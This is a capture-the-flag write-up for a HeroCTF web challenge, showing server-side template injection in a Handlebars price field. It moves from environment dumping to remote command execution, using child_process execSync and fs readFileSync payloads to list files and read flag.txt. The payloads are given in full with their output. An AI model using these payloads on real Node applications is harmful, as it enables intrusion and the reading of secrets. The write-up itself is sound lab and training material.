In buy request, price is vulnerable to SSTI

	POST /buy HTTP/1.1
	Host: chall2.heroctf.fr:3050
	Content-Length: 27
	Accept: */*
	X-Requested-With: XMLHttpRequest
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36
	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
	Origin: http://chall2.heroctf.fr:3050
	Referer: http://chall2.heroctf.fr:3050/services/ddos
	Accept-Encoding: gzip, deflate
	Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
	Cookie: PHPSESSID=3b2fa962168c1295dc63fc02156d8efd
	Connection: close

	id=1&type=ddos&price={{7*7}}

	http://chall2.heroctf.fr:3050/basket
		Total: 49


Response
	X-Powered-By: Express => Hosting with NodeJS Express framework
	=> Handlebars or Jade template engines, try their payload

python3 exp.py {{this}}
	Total: [object Object]<br/>
	=> Handlebars

python3 exp.py '{{JSON.stringify(process.env)}}'
	Total: {"NODE_VERSION":"14.16.1","HOSTNAME":"ca7ae5cfca55","YARN_VERSION":"1.22.5","HOME":"/root","PATH":"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","PWD":"/usr/src/app"}<br/>

Nothing Interesting => Do RCE


================== Solution 1: child_process ==================

python3 exp.py "{{JSON.stringify(process.mainModule.constructor._load('child_process').execSync('ls'))}}"
	Total: {&#34;type&#34;:&#34;Buffer&#34;,&#34;data&#34;:[68,111,99,107,101,114,102,105,108,101,10,82,69,65,68,77,69,46,109,100,10,100,101,109,111,10,102,108,97,103,46,116,120,116,10,105,110,100,101,120,46,106,115,10,110,111,100,101,95,109,111,100,117,108,101,115,10,112,97,99,107,97,103,101,45,108,111,99,107,46,106,115,111,110,10,112,97,99,107,97,103,101,46,106,115,111,110,10,116,101,109,112,108,97,116,101,115,10,118,105,101,119,115,10]}<br/>

	=>

	Dockerfile
	README.md
	demo
	flag.txt
	index.js
	node_modules
	package-lock.json
	package.json
	templates
	views


python3 exp.py "{{JSON.stringify(process.mainModule.constructor._load('child_process').execSync('cat flag.txt'))}}"
	Total: {&#34;type&#34;:&#34;Buffer&#34;,&#34;data&#34;:[72,101,114,111,123,103,51,116,95,48,110,95,109,121,95,108,51,118,52,108,95,52,110,100,95,102,108,51,120,125,10]}<br/>

	=>

	Hero{g3t_0n_my_l3v4l_4nd_fl3x}

================== Solution 2: fs ==================

python3 exp.py "{{JSON.stringify(process.mainModule.constructor._load('fs').readdirSync('.'))}}"
	Total: ["Dockerfile","README.md","demo","flag.txt","index.js","node_modules","package-lock.json","package.json","templates","views"]<br/>


python3 exp.py "{{JSON.stringify(process.mainModule.constructor._load('fs').readFileSync('flag.txt'))}}"
	Total: {&#34;type&#34;:&#34;Buffer&#34;,&#34;data&#34;:[72,101,114,111,123,103,51,116,95,48,110,95,109,121,95,108,51,118,52,108,95,52,110,100,95,102,108,51,120,125,10]}<br/>

	=>

	Hero{g3t_0n_my_l3v4l_4nd_fl3x}

================== Solution 3 ==================

python3 exp.py "process.mainModule.constructor._load('child_process').execSync('cat flag.txt').toString()"
	Total: Hero{g3t_0n_my_l3v4l_4nd_fl3x}

OR

python3 exp.py "process.mainModule.require('child_process').execSync('cat flag.txt').toString()"